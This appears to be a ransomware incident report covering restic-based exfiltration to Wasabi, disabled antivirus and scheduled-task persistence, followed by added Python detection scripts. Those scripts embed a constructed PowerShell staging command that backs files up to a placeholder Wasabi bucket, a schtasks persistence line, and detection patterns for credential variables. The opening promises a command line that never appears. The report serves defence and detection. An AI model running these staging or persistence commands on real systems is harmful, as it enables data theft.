# Full Report
Threat actors are people, too, and like everyone else, they make mistakes. These mistakes can reveal insights into the threat actor, or even expose access to their infrastructure. In this incident, a thorough investigation revealed that the threat actor had accessed the reported endpoint on 24 February, during which they mapped a share to the endpoint (as the `F:\` volume), launched the Microsoft-provided utility PSEXEC to elevate their privileges, and then created the Recovery Diagnostics scheduled task to run `C:\Users\Public\Documents\new.ps1`. The command line for that scheduled task appears as follows:
# Analysis Summary
# Incident Report: INC Ransomware Deployment and Data Exfiltration
## Executive Summary
A threat actor compromised an organization's endpoint to stage and exfiltrate data using the Restic backup utility before deploying INC Ransomware. The attacker successfully disabled security software, including VIPRE and Windows Defender, to facilitate the final encryption phase. The incident was characterized by the use of Living-off-the-Land Binaries (LoLBins) and a lack of full EDR coverage on the affected network.
## Incident Details
- **Discovery Date:** 25 February 2026
- **Incident Date:** 24 February 2026 – 25 February 2026
- **Affected Organization:** Not disclosed
- **Sector:** Not disclosed
- **Geography:** Not disclosed
## Timeline of Events
### Initial Access
- **Date/Time:** 24 February 2026
- **Vector:** Not explicitly stated (attributed to prior access/knowledge of infrastructure).
- **Details:** The threat actor accessed the endpoint and mapped a network share as the `F:\` volume.
### Lateral Movement
- **Details:** The actor utilized `PSEXEC` (a Microsoft Sysinternals utility) to elevate privileges and execute commands across the system.
### Data Exfiltration/Impact
- **Date/Time:** 24 February 2026
- **Details:** Decoded PowerShell commands revealed the use of `restic` (renamed as `winupdate.exe`) to back up data to a Wasabi S3 bucket (`s3:s3.wasabisys[.]com`). A file list `new.txt` was used to target specific data for exfiltration.
### Detection & Response
- **Discovery:** Detected by Huntress SOC analysts on 25 February 2026 during the ransomware deployment phase.
- **Response Actions:** Analysts triaged the incident and the endpoint was taken offline; limited EDR deployment had hindered earlier visibility.
## Attack Methodology
- **Initial Access:** Likely via compromised credentials or existing persistence.
- **Persistence:** Created a scheduled task named "Recovery Diagnostics" to run a malicious PowerShell script (`new.ps1`).
- **Privilege Escalation:** Used `PSEXEC` and scheduled tasks running as `SYSTEM`.
- **Defense Evasion:**
  - Renamed `restic.exe` to `winupdate.exe`.
  - Uninstalled VIPRE Business Agent using a specific uninstaller utility.
  - Disabled Windows Defender Real-Time Protection.
  - Encoded PowerShell commands in Base64 to blend with RMM traffic.
- **Discovery:** Used a text file (`new.txt`) containing targeted file paths for exfiltration.
- **Lateral Movement:** Mapping network drives (`F:\` volume).
- **Exfiltration:** Used the `restic` backup utility to send data to Wasabi cloud storage.
- **Impact:** Deployment of INC Ransomware via `c:\perflogs\win.exe`.
## Impact Assessment
- **Financial:** Significant costs associated with ransomware remediation and potential ransom demands.
- **Data Breach:** Sensitive files were exfiltrated to a threat-actor-controlled S3 bucket.
- **Operational:** Endpoint encryption led to business disruption; security agents were compromised.
- **Reputational:** Potential exposure of client data stored in the exfiltrated environment.
## Indicators of Compromise
- **File Indicators (SHA256):**
  - `1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d` (edr.exe)
  - `e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13` (win.exe - INC Ransomware)
- **Behavioral Indicators:**
  - Deployment of `restic` or renamed versions (e.g., `winupdate.exe`).
  - Scheduled task creation: "Recovery Diagnostics".
  - Execution of `VIPRE Business AgentAgentUninstallPassword.exe`.
  - PowerShell environment variables containing `AWS_ACCESS_KEY_ID` and `RESTIC_REPOSITORY`.
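The behavioral indicators above are only useful if the Base64-encoded PowerShell the actor used is decoded before matching. The following is an added hunting example written for this report; it is not code from the report or from Huntress. It decodes `-EncodedCommand` payloads (UTF-16LE Base64) from process command lines and matches the decoded text against rules built from the indicators listed in this section. All sample command lines are constructed; the bucket name, access key and binary path are placeholders, not values from the incident.

```python
"""Decode encoded PowerShell command lines and match the report's restic/INC indicators."""
import base64
import re
from typing import Dict, List, Optional

# Detection rules derived from the report's behavioral indicators; the rule names are ours.
RULES: Dict[str, re.Pattern] = {
    "restic_env_vars": re.compile(r"RESTIC_REPOSITORY|RESTIC_PASSWORD|AWS_ACCESS_KEY_ID", re.I),
    "wasabi_s3_repo": re.compile(r"s3:s3\.wasabisys\.com", re.I),
    "renamed_restic": re.compile(r"winupdate\.exe|\brestic(?:\.exe)?\b", re.I),
    "recovery_diagnostics_task": re.compile(r"Recovery Diagnostics", re.I),
    "public_documents_script": re.compile(r"C:\\Users\\Public\\Documents\\new\.ps1", re.I),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline: str) -> dict:
    """Match rules against the raw command line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits: List[str] = sorted(name for name, rx in RULES.items() if rx.search(text))
    return {"encoded": decoded is not None, "decoded": decoded, "hits": hits}


def encode_for_powershell(script: str) -> str:
    """Build the constructed sample the way powershell.exe expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed staging script resembling what the report describes. The bucket, key ID
# and binary location are placeholders (assumptions), not the incident's values.
SAMPLE_SCRIPT = (
    '$env:RESTIC_REPOSITORY="s3:s3.wasabisys.com/EXAMPLE-BUCKET"; '
    '$env:AWS_ACCESS_KEY_ID="EXAMPLEKEYID"; '
    'C:\\Users\\Public\\winupdate.exe backup --files-from C:\\Users\\Public\\Documents\\new.txt'
)

# Constructed process command lines as a SOC would see them in process-creation telemetry.
SAMPLE_EVENTS = [
    # encoded launch of the staging script
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    # scheduled-task persistence matching the report's task name and script path
    'schtasks.exe /create /tn "Recovery Diagnostics" '
    '/tr "powershell.exe -File C:\\Users\\Public\\Documents\\new.ps1" /ru SYSTEM',
    # benign administrative activity that must not alert
    "powershell.exe -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = analyse(event)
        print(result["hits"] or "no hits", "| encoded" if result["encoded"] else "")
```

Matching on the decoded payload is what surfaces the `RESTIC_REPOSITORY`/`AWS_ACCESS_KEY_ID` indicators; the raw command line of the first sample contains none of them. In production the same `analyse()` would run over Sysmon Event 1 or Security 4688 command lines and over PowerShell script-block logs.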
## Response Actions
- **Containment:** Endpoint was taken offline to prevent further encryption/propagation.
- **Eradication:** Threat actor infrastructure identified (Wasabi S3 bucket).
- **Recovery:** Investigation of Windows Event Logs (IDs 600, 15, 5001) to reconstruct the timeline.
## Lessons Learned
- **Visibility Gaps:** The partial deployment of the Huntress agent and the absence of a SIEM allowed the attacker to operate undetected during the staging phase.
- **Insecure Tools:** Threat actors frequently leverage legitimate backup utilities (`restic`) and admin tools (`PSEXEC`) to bypass traditional signature-based detection.
- **Attacker Mistakes:** The threat actor failed to redact the `RESTIC_PASSWORD` in the PowerShell logs, providing insight into their infrastructure.
## Recommendations
- **Complete EDR Coverage:** Ensure security agents are deployed on 100% of endpoints.
- **Logging:** Implement centralized logging (SIEM) to monitor for Base64 PowerShell commands and Windows Event Log deletions/service stops.
- **Access Control:** Restrict the use of `PSEXEC` and similar administrative tools to authorized personnel via allow-listing.
- **Cloud Monitoring:** Monitor for unexpected outbound traffic to known cloud storage providers like Wasabi or AWS S3.
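The cloud-monitoring recommendation can be turned into a concrete detection. Below is an added example, not code from the report: it aggregates outbound bytes per source host and object-storage provider from proxy records and alerts when a host that is not approved for backups pushes more than a threshold to a provider such as Wasabi or AWS S3. The log format, host names, byte counts, provider list, approved-source set and threshold are all constructed assumptions to be tuned to your environment.

```python
"""Flag bulk egress to cloud object storage from unapproved hosts (constructed proxy log)."""
from collections import defaultdict
from typing import Dict, List, Tuple

# Object-storage domains named in the report's recommendation plus other common ones
# (assumed list; extend with the providers your organisation actually uses).
STORAGE_SUFFIXES = (
    "wasabisys.com",
    "amazonaws.com",
    "blob.core.windows.net",
    "storage.googleapis.com",
    "backblazeb2.com",
)

# Hosts legitimately expected to talk to object storage (assumption: a backup server).
APPROVED_SOURCES = {"backup01"}

# Alert threshold per (host, provider) over the log window (assumption: 500 MiB).
THRESHOLD_BYTES = 500 * 1024 * 1024

# Constructed proxy records, one per line: "<iso-time> <src_host> <dst_fqdn> <bytes_out>"
SAMPLE_PROXY_LOG = """\
2026-02-24T22:01:10Z ws-042 s3.wasabisys.com 268435456
2026-02-24T22:05:31Z ws-042 s3.wasabisys.com 301989888
2026-02-24T22:07:02Z ws-042 example-cdn.invalid 1048576
2026-02-24T23:00:00Z backup01 s3.us-west-2.amazonaws.com 4294967296
2026-02-24T23:10:00Z ws-017 storage.googleapis.com 2097152
malformed line without enough fields
"""


def storage_provider(fqdn: str) -> str:
    """Return the matching provider suffix, or '' if the host is not object storage."""
    host = fqdn.lower().rstrip(".")
    for suffix in STORAGE_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return ""


def aggregate_egress(log_text: str) -> Dict[Tuple[str, str], int]:
    """Sum bytes_out per (source host, provider); skip non-storage destinations and bad lines."""
    totals: Dict[Tuple[str, str], int] = defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, src, dst, nbytes = parts
        provider = storage_provider(dst)
        if not provider:
            continue
        try:
            totals[(src, provider)] += int(nbytes)
        except ValueError:
            continue
    return dict(totals)


def find_suspicious_egress(log_text: str) -> List[dict]:
    """Alert on unapproved hosts that exceed THRESHOLD_BYTES to any storage provider."""
    alerts = []
    for (src, provider), total in sorted(aggregate_egress(log_text).items()):
        if src in APPROVED_SOURCES or total < THRESHOLD_BYTES:
            continue
        alerts.append({"source": src, "provider": provider, "bytes_out": total})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_egress(SAMPLE_PROXY_LOG):
        print(alert)
```

Aggregating per host and provider rather than alerting on single requests matters because a backup tool like `restic` uploads a repository as many small objects; no individual request looks unusual, but the total from a workstation to a storage provider it has never used does.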